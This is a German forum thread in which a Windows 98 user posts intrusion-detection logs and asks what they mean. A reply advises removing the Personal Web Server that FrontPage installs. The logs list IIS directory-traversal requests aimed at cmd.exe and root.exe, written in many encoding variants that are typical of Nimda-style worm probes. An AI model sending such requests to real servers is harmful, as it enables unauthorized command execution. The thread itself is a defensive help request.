Ich habe auf meienm Rechner (W98)NFR installiert. Seitdem ich auf einer 2. Partition W2000 laufen habe bekomme ich, wenn ich unter W98 im Internet bin, die folgenden Meldungen von NFR:
Sun Oct 21 16:21:57 HTTP request from 62.158.220.148: GET /scripts/root.exe?/c+dir
Sun Oct 21 16:22:00 HTTP request from 62.158.220.148: GET /MSADC/root.exe?/c+dir
Sun Oct 21 16:22:01 HTTP request from 62.158.220.148: GET /c/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:02 HTTP request from 62.158.220.148: GET /d/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:02 HTTP request from 62.158.220.148: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:03 HTTP request from 62.158.220.148: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:05 HTTP request from 62.158.220.148: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:06 HTTP request from 62.158.220.148: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:07 HTTP request from 62.158.220.148: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:07 HTTP request from 62.158.220.148: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:09 HTTP request from 62.158.220.148: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:10 HTTP request from 62.158.220.148: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:11 HTTP request from 62.158.220.148: GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:12 HTTP request from 62.158.220.148: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:14 HTTP request from 62.158.220.148: GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:16 HTTP request from 62.158.220.148: GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:27:57 HTTP request from 62.95.18.50: GET /scripts/root.exe?/c+dir
Sun Oct 21 16:27:59 HTTP request from 62.95.18.50: GET /MSADC/root.exe?/c+dir
Sun Oct 21 16:28:03 HTTP request from 62.95.18.50: GET /c/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:08 HTTP request from 62.95.18.50: GET /d/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:08 HTTP request from 62.95.18.50: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:09 HTTP request from 62.95.18.50: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:14 HTTP request from 62.95.18.50: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:15 HTTP request from 62.95.18.50: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:17 HTTP request from 62.95.18.50: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:18 HTTP request from 62.95.18.50: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:19 HTTP request from 62.95.18.50: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:24 HTTP request from 62.95.18.50: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:28 HTTP request from 62.95.18.50: GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:29 HTTP request from 62.95.18.50: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:30 HTTP request from 62.95.18.50: GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:31 HTTP request from 62.95.18.50: GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Weiß jemand was die Meldungen zu bedeuten haben??
Vielen Dank
Fbe
Viren, Spyware, Datenschutz 11.213 Themen, 94.186 Beiträge
aha, da liegt das problem. FP installiert standardmäßig den personal webserver mit. dieser ist zwar normalerweise nicht anfällig für nimda, aber trotzdem alles andere als sicher. mein tipp: runter damit. wahrscheinlich über die setuproutine von frontpage.